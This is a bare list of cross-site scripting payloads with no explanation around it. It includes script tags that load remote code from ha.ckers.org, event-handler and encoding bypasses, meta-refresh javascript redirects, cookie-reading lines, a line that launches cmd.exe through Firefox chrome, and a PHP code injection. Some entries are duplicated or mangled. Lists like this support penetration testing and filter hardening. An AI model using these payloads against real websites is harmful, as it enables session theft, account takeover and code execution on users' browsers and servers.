&lt;SCRIPT&gt;document&#46;write(\”&lt;SCRI\”);&lt;/SCRIPT&gt;PT SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;
&lt;/script&gt;&lt;script&gt;confirm(1)&lt;/script&gt;
&lt;script&gt;prompt(&apos;1&apos;)&lt;/script&gt;
&lt;SCRIPT =\”&gt;\” SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt;
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;
&lt;SCRIPT SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\”&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT/SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt;
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT/XSS SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
&lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt;
&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
&lt;SPAN DATASRC=\”#xss\” DATAFLD=\”B\” DATAFORMATAS=\”HTML\”&gt;&lt;/SPAN&gt;
&lt;STYLE&gt;&#46;XSS{background-image&#58;url(\”javascript&#058;alert(‘XSS’)\”);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
&lt;STYLE&gt;BODY{-moz-binding&#58;url(\”http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\”)}&lt;/STYLE&gt;
&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;
&lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt;
&lt;STYLE&gt;@im\port&apos;\ja\vasc\ript:alert(&quot;XSS&quot;)&apos;;&lt;/STYLE&gt;
&lt;STYLE&gt;@import’http&#58;//ha&#46;ckers&#46;org/xss&#46;css’;&lt;/STYLE&gt;
&lt;STYLE&gt;@im\port’\ja\vasc\ript&#58;alert(\”XSS\”)’;&lt;/STYLE&gt;
&lt;STYLE&gt;li {list-style-image&#58; url(\”javascript&#058;alert(‘XSS’)\”);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
&lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt;
&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt;&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt;
lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt;
&lt;STYLE type=\”text/css\”&gt;BODY{background&#58;url(\”javascript&#058;alert(‘XSS’)\”)}&lt;/STYLE&gt;
&lt;STYLE TYPE=\”text/javascript\”&gt;alert(‘XSS’);&lt;/STYLE&gt;
&lt;svg/onload=alert(63)//
&lt;svg/onload&equals;alert(1)&gt;
&lt;t&#58;set attributeName=\”innerHTML\” to=\”XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\”&gt;
&lt;TABLE BACKGROUND=\”javascript&#058;alert(‘XSS’)\”&gt;
&lt;TABLE BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TABLE&gt;
&lt;TABLE&gt;&lt;TD BACKGROUND=\”javascript&#058;alert(‘XSS’)\”&gt;
&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;
&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(“XSS”);&lt;/SCRIPT&gt;
&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\”XSS\”);&lt;/SCRIPT&gt;
&lt;?xml&#58;namespace prefix=\”t\” ns=\”urn&#58;schemas-microsoft-com&#58;time\”&gt;
&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\”javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert(‘XSS’);\”&gt;&#93;&#93;&gt;
&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt;
&lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;! — — &gt;cript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
&lt;XML ID=\”xss\”&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\”javas&lt;! — — &gt;cript&#58;alert(‘XSS’)\”&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
&lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt;
&lt;XML SRC=\”xsstest&#46;xml\” ID=I&gt;&lt;/XML&gt;
‘’;! — \”&lt;XSS&gt;=&{()}
&lt;XSS STYLE=\”behavior&#58; url(xss&#46;htc);\”&gt;
&lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt;
&lt;XSS STYLE=&quot;xss:expression(alert(&apos;XSS&apos;))&quot;&gt;
&lt;XSS STYLE=\”xss&#58;expression(alert(‘XSS’))\”&gt;
maliciousdata[varinput[‘name’]] = payloads[1]
<marguee/onstart=alert(1)>//INJECTX
<marker id=”a” markerWidth=”1000" markerHeight=”1000" refX=”0" refY=”0">
“><marquee>confirm( `bypass :)`)</marquee>
<marquee/finish=confirm(2)>/
‘“>><marquee><h1>1</h1></marquee>
<marquee><h1>XSS by xss</h1></marquee>
‘>><marquee><h1>XSS</h1></marquee>
‘>><marquee><h1>XSS</h1></marquee>
‘“>><marquee><h1>XSS</h1></marquee>
‘“>><marquee><h1>XSS</h1></marquee>
‘“>><marquee><img src=x onerror=confirm(1)></marquee>
‘“>><marquee><img src=x onerror=confirm(1)></marquee>”></plaintext\></|\><plaintext/onmouseover=prompt(1)>
“>><marquee><img src=x onerror=confirm(1)></marquee>” ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’ →” ></script><script>alert(1)</script>”><img/id=”confirm&lpar; 1)”/alt=”/”src=”/”onerror=eval(id&%23x29;>’”><img src=”http: //i.imgur.com/P8mL8.jpg”>
‘“>><marquee><img src=x onerror=confirm(1)></marquee>”></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’ →”></script><script>alert(1)</script>”><img/id=”confirm&lpar;1)”/alt=”/”src=”/”onerror=eval(id&%23x29;>’”><img src=”http://i.imgur.com/P8mL8.jpg">
<marquee loop=1 width=0 onfinish=alert(1)>
>><marquee loop=1 width=0 onfinish=alert(1)>
<marquee loop=1 width=0 onfinish=alert(100)>
<marquee loop=1 width=0 onfinish=alert(1)>//INJECTX
<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)
/><marquee onfinish=confirm(123)>a</marquee>
/><marquee onfinish=confirm(123)>a</marquee>
<marquee onScroll marquee onScroll=”javascript:javascript:alert(1)”></marquee onScroll>
<mArquee onStart%3D[~[onmouseleave(([[(alert(1))]]))]] ]
<marquee/onstart=alert()>
<marquee onstart=alert(1)>
<marquee/onstart=alert(1)>renwa
<marquee onstart=alert(30)></marquee>
<marquee onstart=alert(99)>
<marquee onstart=alert(‘XSS’)>
<marquee/onstart=confirm(2)>/
<marquee/onstart=confirm(2)>
<marquee/onstart=confirm(/XSS/.source);confirm(1)>
><marquee/onstart=confirm(/XSS/.source);confirm(1)>
“<marquee/onstart=confirm(/XSS/.source);confirm(1)>”
“\”><marquee/onstart=confirm(/XSS/.source);confirm(1)>”,
<marquee/onstart=document.body.innerHTML=location.hash>//#<img src=x onerror=prompt(1)>>
<marquee onstart=’javascript:alert(‘1’);’>=(?_?)=
<marquee onstart=’javascript:alert&#x28;1&#x29;’>^__^
<marquee onstart=’javascript:confirm&#x28;1&#x29;’>^__^
<marquee onStart marquee onStart=”javascript:javascript:alert(1)”></marquee onStart>
<marquee/onstart=this[‘innerHTML’]=location.hash;>//#<img src=x onerror=alert(document.domain)>
<marquee/onstart=this[‘innerHTML’]=unescape(location.hash);>//#<img src=x onerror=alert(document.domain)>
<marquee><script>alert(‘XSS’)</script></marquee>
<marquee><script>alert(‘XSS’)</script></marquee>
‘;’>”><marquee>test</marquee><plaintext/onmouseover=prompt(test)>
<math><annotation-xml encoding=text/html><![CDATA[></math><!]]>
<math><annotation-xml encoding=text/html><script></</script/>a<!>l<?>ert&lpar;</>1&rpar;</></script>
<math><annotation-xml encoding=”text/html”><xmp>&lt;/xmp&gt;&lt;img src=x onerror=alert(1)&gt;</xmp>
<math><annotation-xml><textarea/><svg><script>alert(1)</script>
<math><a xlink:href=javascript:…>
<math><a xlink:href=javascript:alert(1)>M
<math><a/xlink:href=javascript&colon;confirm&lpar;1&rpar;>click
<math><a/xlink:href=javascript:eval(‘\141\154\145\162\164\50\61\51’)>X
<math><a xlink:href=”//jsfiddle.net/t846h/”>click //
<math><a xlink:href=”//jsfiddle.net/t846h/”>click
<math><a xlink:href=”//jsfiddle.net/t846h/”>click
<Math> <a xlink:href=”//jsfiddle.net/t846h/”> click
<math><brute href=javascript:alert(1)>
<math><brute href=javascript:alert(1)>click *
<math><brute href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<math><brute xlink:href=javascript:alert(175)>click
<math><brute xlink:href=javascript:alert(1)>click *
<math><brute xlink:href=javascript:alert(1)>click
<math><brute xlink:href=javascript:alert(1)>click
<math href=”javascript:alert(1)”>CLICKME
<math href=”javascript:javascript:alert(1)”>CLICKME</math> <math> <maction actiontype=”statusline#http://google.com" xlink:href=”javascript:javascript:alert(1)”>CLICKME</maction> </math>
<math href=”javascript:javascript:alert(1)”>CLICKME</math> <math> <maction actiontype=”statusline#http://google.com" xlink:href=”javascript:javascript:alert(1)”>CLICKME</maction> </math>
<math><kukux href=javascript:alert(164)>click
<math><kukux xlink:href=javascript:alert(175)>click
<math><maction actiontype=”statusline#http://google.com" href=”//evil”>click
<math><script>//<head><script>alert(1)</script>
<math><script>sgl=’<img/src=xx:x onerror=alert(1)>’</script>
<math><style>*{font-family:’<img/src=xx:x onerror=alert(1)>’}</style>
<math><!V href=javascript:alert(1)//
<math><!V” href=javascript:alert(1)//
<math xlink:href=javascript:..>
<math xlink:href=”jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/ — !&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e”>click me</math>
<math xml:base=”javascript:alert(1)//”><mrow href=”#”>qwe</mrow></math>
<math xml:base=”javascript:alert(1)//”> <mrow href=”#”>qwe</mrow></math>
<math><XSS href=”javascript:alert(location)”>aaa
{{m=[({}).constructor.defineProperties];[[‘’.toString.constructor,{‘constructor’:{} }].reduce(m[0])];’’.toString.constructor(‘alert(1)’)()}}
<me#a http-equiv=Content-Security-Policy content=script-src self>
me!</button></form></dialog>
<menu id=x contextmenu=x onshow=alert(107)>right click me!
<menu id=x contextmenu=x onshow=alert(1)>right click me!
<meta charset=gbk><script>a=’x?\’;alert(1)//’;</script>
<meta charset=iso-2022-cn>
<meta charset=iso-2022-jp><%1B(Jd%1B(Ji%1B(Jv><i%1B(Jm%1B(Jg s%1B(Jr%1B(Jc%1B(J=%1B(Jx o%1B(Jn%1B(Jer%1B(Jr%1B(Jo%1B(Jr%1B(J=%1B(Ja%1B(Jl%1B(Je%1B(Jr%1B(Jt(1)//%1B(J<%1B(J/%1B(Jd%1B(Jiv%1B(J>%1B(J
<meta charset=iso-2022-jp><script>alert(1)[0x1B]$@[0x0A]</script>
<meta charset=iso-2022-jp><script>alert(14)[0x1B]$@[0x0A]</script>
<meta charset=iso-2022-jp><svg o[0x1B](Bnload=alert(1)>
<meta charset=iso-2022-jp><svg o[0x1B](Bnload=alert(13)>
<meta charset=”mac-farsi”>?script?javascript:alert(1)?/script?
<meta charset=”x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
<meta charset= “x-imap4-modified-utf7”&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
<meta charset=”x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
<meta charset=”x-mac-farsi”>A?A?script A?A?confirm(1)//A?A?/script A?A?
<meta/content=”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg==”http-equiv=refresh>
<meta content=”&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)” http-equiv=”refresh”/>
<meta content=”&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)” http-equiv=”refresh”/>
<Meta content = “& NewLine; 1 & NewLine ;; JAVASCRIPT & colon; alert (1)” http-equiv = “refresh” />
<meta content=”&NewLine; 1 &NewLine;; JAVASCRIPT&colon; confirm(1)” http-equiv=”refresh”/>
<META HTTP-EQUIV=”Link” Content=”<%(css)s>; REL=stylesheet”>
<;META HTTP-EQUIV=”;Link”; Content=”;<;http://ha.ckers.org/xss.css>;; REL=stylesheet”;>;
<META HTTP-EQUIV=”Link” Content=”<http://ha.ckers.org/xss.css>; REL=stylesheet”>
<META HTTP-EQUIV=”Link” Content=”<http://ha.ckers.org/xss.css>;; REL=stylesheet”>
<meta HTTP-EQUIV=”Link” Content=”<http://www.securitycompass.com/xss.css>; REL=stylesheet”>
<META HTTP-EQUIV=”Link” Content=”<http://xss.cx/xss.css>; REL=stylesheet”>
<META HTTP-EQUIV=”Link” Content=”<http://xxxx.com/xss.css>; REL=stylesheet”>
<META HTTP-EQUIV=”Link” Content=”<javascript:alert(‘XSS’)>; REL=stylesheet”>
<META HTTP-EQUIV=”Link” Content=”<javascript:confirm(document.location)>; REL=stylesheet”>
<meta http-equiv=”refresh” content=”0;
<meta http-equiv=refresh content=”0 javascript:alert(1)”>
<meta http-equiv=”refresh” content=”0;javascript&colon;alert(1)”/>
<meta http-equiv=”refresh” content=”0;javascript&colon;alert(1)”/>?
<meta http-equiv=”refresh” content=”0;javascript&colon;alert(1)”/>
<Meta http-equiv = “refresh” content = “0; javascript & colon; alert (1)” />
<meta http-equiv=”refresh” content=”0;javascript&colon;confirm(1)”/>?
<meta http-equiv=”refresh” content=”0;javascript&colon;confirm(1)”/>
“><meta http-equiv=”refresh” content=”0;javascript&colon;confirm(1)”/>
<meta http-equiv=refresh content=”0 javascript:confirm(1)”>
<meta http-equiv=”refresh” content=”0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”>
<;META HTTP-EQUIV=”;refresh”; CONTENT=”;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”;>;
<META HTTP-EQUIV=”refresh” CONTENT=”0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>
<META HTTP-EQUIV=”refresh” CONTENT=”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>
<META HTTP-EQUIV=”refresh” CONTENT=”0;url=data:text/html;base64###PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>
<meta http-equiv=”refresh” content=”0;url=//goo.gl/nlX0P”>
<meta http-equiv=”refresh” content=”0;url=//goo.gl/nlX0P”>
<Meta http-equiv = “refresh” content = “0; url = // goo.gl/nlX0P”>
<meta http-equiv=”refresh” content=”0;url=http://good/[>>>inj]&#59url=http://evil/[<<<inj]">
<;META HTTP-EQUIV=”;refresh”; CONTENT=”;0; URL=http://;URL=javascript:alert(';XSS';);";>;
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert('XSS');">
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert('XSS');">
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(XSS);">
<META HTTP-EQUIV=\”refresh\” CONTENT=\”0; URL=http://;URL=javascript:alert('XSS');\">
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:confirm(document.location);">
<meta HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:document.vulnerable=true;">
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:javascript:alert(1);">
<META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript:alert(1);\”>
<META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XoSS’);”>
<;META HTTP-EQUIV=”;refresh”; CONTENT=”;0;url=javascript:alert(‘;XSS’;);”;>;
<META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XSS’);”>
<META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XSS’);”>
<META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(XSS);”>
<META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript:alert(‘XSS’);\”>
<meta http-equiv=”refresh” content=”0;url=javascript:confirm(1)”>
<META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:confirm(document.location);”>
<meta http-equiv=”refresh” content=”0;url=javascript:document.vulnerable=true;”>
<meta HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:document.vulnerable=true;”>
“><meta http-equiv=”Refresh” content=”0;url=javascript:document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))>
“><meta http-equiv=”Refresh”content=”0;url=javascript:document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))>
<META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:javascript:alert(1);”>
<meta http-equiv=refresh content=+.1,javascript:confirm(document.cookie)>
<meta http-equiv=refresh content=”?,javascript&colon;alert(1)”>
<META HTTP-EQUIV=”Set-Cookie” Content=”USERID=&lt;SCRIPT&gt;alert(‘XSS’)&lt;/SCRIPT&gt;”>
<META HTTP-EQUIV=”Set-Cookie” Content=”USERID=&lt;SCRIPT&gt;confirm(document.location)&lt;/SCRIPT&gt;”>
<;META HTTP-EQUIV=”;Set-Cookie”; Content=”;USERID=<;SCRIPT>;alert(‘;XSS’;)<;/SCRIPT>;”;>;
<META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>”>
<meta HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>document.vulnerable=true</SCRIPT>”>
<meta http-equiv=”x-ua-compatible” content=”ie=7">
<meta http-equiv=”x-ua-compatible” content=”ie=7"><iframe src=//targetsite.com?xss=<div/style=”width:expression(confirm(1))”>X</div>
<meta http-equiv=”x-ua-compatible” content=”ie=7"><iframe src=��//targetsite.com?xss=<div/style=”width:expression(confirm(1))”>X</div>��
<meta http-equiv=x-ua-compatible content=ie=8>
<meta http-equiv=”x-ua-compatible” content=”ie=9">
<meta http-equiv=”x-ua-compatible” content=”ie=9"><iframe src=//targetsite?xss=<svg/onload%00=%00locatio%00n=nam%00e name=javascript:alert(document.domain)>
<meta name=referrer content=never>
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow=”alert(1)”;
<meta style=”xss:expression(open(alert(1)))” />
<meter onmouseover=”alert(1)”
method=”dialog”><button>Close
<MovieHeight>600</MovieHeight>
?movieName=”;]);}catch(e){}if(!self.a)self.a=!confirm(document.domain);//
<MovieURL>http://thebest404pageever.com/swf/FUUUUUUUUUUUUUUUUUUUUUUUUUCK.swf</MovieURL>
<MovieWidth>800</MovieWidth>
moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true
$=<>@mozilla.org/js/function</>;$::[<>alert</>](/@superevr/)
$=<>@mozilla.org/js/function</>;$::[<>alert</>](/@superevr/)
myTagid=”someId” class=”class1vdata-foo=”bar” /myTag
myTagid=”someId” class=”class1vdata-foo=”bar”?/myTag
name=alert(1)onerror=eval(name) src=1 autofocus onfocus=eval(name)
name=javascript:alert(document.domain)>
name=”javascript:alert(“XSS”)”></iframe>
<name>’,’’)); phpinfo(); exit;/*</name>
navigateToURL(new URLRequest(“Javascript: document.write(\”<script>confirm(1)</scr\”+\”ipt>\”)”),”_self”)
navigator.geolocation.getCurrentPosition(function(p){
navigatorurl:test” -chrome “javascript:C=Components.classes;I=Components.interfaces;file=C[\’@mozilla.org/file/local;1\’].createInstance(I.nsILocalFile);file.initWithPath(\’C:\’+String.fromCharCode(92)+String.fromCharCode(92)+\’Windows\’+String.fromCharCode(92)+String.fromCharCode(92)+\’System32\’+String.fromCharCode(92)+String.fromCharCode(92)+\’cmd.exe\’);process=C[\’@mozilla.org/process/util;1\’].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
navigator.vibrate(500)
navigator.webkitGetUserMedia({‘video’:true},function(s){
navigator.webkitGetUserMedia({video:true},function(s){
\nconfirm(1)
<NeatHtmlLt />&lt;BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
<NeatHtmlLt />&lt;? echo(‘<NeatHtmlLt />&lt;SCR)’; echo(‘IPT>alert(“XSS”)</SCRIPT>’); ?>
<NeatHtmlLt />&lt;IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
<NeatHtmlLt />&lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<NeatHtmlLt />&lt;IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<NeatHtmlLt />&lt;IMG SRC=`javascript:alert(“RSnake says, ‘XSS’”)`>
<NeatHtmlLt />&lt;IMG SRC=”javascript:alert(‘XSS’)”
<NeatHtmlLt />&lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<NeatHtmlLt />&lt;?import namespace=”xss”implementation=”http://ha.ckers.org/xss.htc">
<NeatHtmlLt />&lt;META HTTP-EQUIV=”Link” Content=”<NeatHtmlLt />&lt;http://ha.ckers.org/xss.css>; REL=stylesheet”>
<NeatHtmlLt />&lt;META HTTP-EQUIV=”refresh”CONTENT=”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>
<NeatHtmlLt />&lt;META HTTP-EQUIV=”refresh” CONTENT=”0;URL=http://;URL=javascript:alert('XSS');">
<NeatHtmlLt />&lt;META HTTP-EQUIV=”refresh”CONTENT=”0;url=javascript:alert(‘XSS’);”>
<NeatHtmlLt />&lt;META HTTP-EQUIV=”Set-Cookie” Content=”USERID=&lt;SCRIPT&gt;alert(‘XSS’)&lt;/SCRIPT&gt;”>
<NeatHtmlLt />&lt;<SCRIPT>alert(“XSS”);//<NeatHtmlLt />&lt;</SCRIPT>
<NeatHtmlLt />&lt;SCRIPT\s” != “<NeatHtmlLt />&lt;SCRIPT/XSS\s
<NeatHtmlLt />&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<NeatHtmlLt />&lt;SCRIPT/SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
/<NeatHtmlLt />&lt;script((\s+\w+(\s*=\s*(?:”(.)*?”|’(.)*?’|[^’”>\s]+))?)+\s*|\s*)src/i
<NeatHtmlLt />&lt;SCRIPT/XSS SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
<NeatHtmlParserReset s=’’ d=”” /><script></script><TABLE BACKGROUND_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
<NeatHtmlReplace_BASE HREF=”javascript:alert(‘XSS’);//”>
<NeatHtmlReplace_BGSOUND SRC_NeatHtmlReplace=”javascript:alert(‘XSS’);”>
<NeatHtmlReplace_BODY BACKGROUND_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
<NeatHtmlReplace_BODY ONLOAD_NeatHtmlReplace=”alert(‘XSS’)”>
<NeatHtmlReplace_C>&lt;IMG SRC=&quot;javascript:alert(‘XSS’);&quot;&gt;
</NeatHtmlReplace_C></NeatHtmlReplace_X></NeatHtmlReplace_xml><SPAN DATASRC_NeatHtmlReplace=”#I” DATAFLD_NeatHtmlReplace=”C” DATAFORMATAS_NeatHtmlReplace=”HTML”></SPAN>
<NeatHtmlReplace_EMBED SRC_NeatHtmlReplace=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess_NeatHtmlReplace=”always”></NeatHtmlReplace_EMBED>
<NeatHtmlReplace_EMBED SRC_NeatHtmlReplace=”http://ha.ckers.org/xss.swf" AllowScriptAccess_NeatHtmlReplace=”always”></NeatHtmlReplace_EMBED>
<NeatHtmlReplace_FRAMESET><NeatHtmlReplace_FRAME SRC_NeatHtmlReplace=”javascript:alert(‘XSS’);”></NeatHtmlReplace_FRAMESET>
</NeatHtmlReplace_HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
<NeatHtmlReplace_HEAD><NeatHtmlLt />&lt;META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7">
<NeatHtmlReplace_HTML xmlns:xss_NeatHtmlReplace=”xmlns:xss”>
